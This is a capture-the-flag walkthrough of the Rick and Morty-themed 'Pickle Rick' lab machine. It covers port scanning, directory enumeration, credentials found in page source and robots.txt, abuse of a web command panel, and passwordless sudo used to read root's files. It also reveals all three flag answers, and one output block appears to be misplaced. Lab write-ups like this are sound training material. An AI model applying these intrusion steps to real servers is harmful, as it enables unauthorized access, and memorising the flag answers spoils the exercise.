About the machine: This Rick and Morty-themed challenge requires you to exploit a web server and find three ingredients to help Rick make his potion and transform himself back into a human from a pickle.
Let's start by using Nmap to look for open ports. We can see that the HTTP port is open, as well as the Apache version. We can also see that SSH is running:
nmap -AF 10.10.63.170
RESULT:
PORT SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let us see if we can find out more about the machine by using Whatweb:
whatweb 10.10.63.170
http://10.10.63.170 [200 OK] Apache[2.4.18], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.63.170], JQuery, Script, Title[Rick is sup4r cool]
Seems like Whatweb gave us the same information. The server is running on Ubuntu and uses Apache 2.4.18. Additionally, the title of the website is "Rick is sup4r cool".
After visiting the website and checking its source code, we can discover Rick's username "RickRul3s" which he commented out on purpose so that he won't forget.
We can try using Dirbuster to discover files and directories on the website. With Dirbuster, we can see that there is a /login.php
and a /portal.php
. The latter redirects us to the former and now we know where to enter the username that we found earlier, "RickRul3s".
Let's also try dirb maybe we can get some more files or directories:
==> DIRECTORY: http://10.10.63.170/assets/
+ http://10.10.63.170/index.html (CODE:200|SIZE:1062)
+ http://10.10.63.170/robots.txt (CODE:200|SIZE:17)
+ http://10.10.63.170/server-status (CODE:403|SIZE:300)
Interestingly a robots.txt
file exists. If we try to check it out, it contains Rick's favorite catchphrase "Wubbalubbadubdub". Could this be Rick's password? Let's try using this as his password.
We are now greeted with the following page:
We can see that there is a command panel, and the rest of the tabs redirect us to /denied.php
which says "Only the real Rick can access this".
After running ls -al
in the command panel we can see the following files and directories:
total 40
drwxr-xr-x 3 root root 4096 Feb 10 2019 .
drwxr-xr-x 3 root root 4096 Feb 10 2019 ..
-rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 Sup3rS3cretPickl3Ingred.txt
drwxrwxr-x 2 ubuntu ubuntu 4096 Feb 10 2019 assets
-rwxr-xr-x 1 ubuntu ubuntu 54 Feb 10 2019 clue.txt
-rwxr-xr-x 1 ubuntu ubuntu 1105 Feb 10 2019 denied.php
-rwxrwxrwx 1 ubuntu ubuntu 1062 Feb 10 2019 index.html
-rwxr-xr-x 1 ubuntu ubuntu 1438 Feb 10 2019 login.php
-rwxr-xr-x 1 ubuntu ubuntu 2044 Feb 10 2019 portal.php
-rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 robots.txt
We can try to use the cat
but it is disabled, however, we can read the files by inserting them in the URL:
Alternatively, we can also read the files using the strings <file>
command.
We now have the first ingredient "mr. meeseek hair".
To find the second ingredient we can run strings clue.txt
which hints that we should "Look around the file system for the other ingredients."
After snooping around the file system, we can find the second ingredient, which is located in the home/rick directory.
ls -la ../../../home/rick
drwxrwxrwx 2 root root 4096 Feb 10 2019 .
drwxr-xr-x 4 root root 4096 Feb 10 2019 ..
-rwxrwxrwx 1 root root 13 Feb 10 2019 second ingredients
We can then display it using strings ../../../home/rick/second \ingredients
. The second ingredient is "1 jerry tear".
In the filesystem we can try to check the root directory, however, it will not display anything, which could mean that we don't have permission to access it.
Surprisingly, when running sudo
it will not ask for a password. The following are the contents of the root directory:
sudo ls -la ../../../root
drwx------ 4 root root 4096 Feb 10 2019 .
drwxr-xr-x 23 root root 4096 May 8 09:15 ..
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 Feb 10 2019 .ssh
-rw-r--r-- 1 root root 29 Feb 10 2019 3rd.txt
drwxr-xr-x 3 root root 4096 Feb 10 2019 snap
It appears that the last ingredient can be found within the third file named "3rd.txt".
sudo strings ../../../root/3rd.txt
drwxr-xr-x 4 root root 4096 Feb 10 2019 .
drwxr-xr-x 23 root root 4096 May 8 10:46 ..
drwxrwxrwx 2 root root 4096 Feb 10 2019 rick
drwxr-xr-x 4 ubuntu ubuntu 4096 Feb 10 2019 ubuntu
Running sudo strings ../../../root/3rd.txt
gives us the final ingredient "fleeb juice"
Now Pickle Rick can transform back into a human.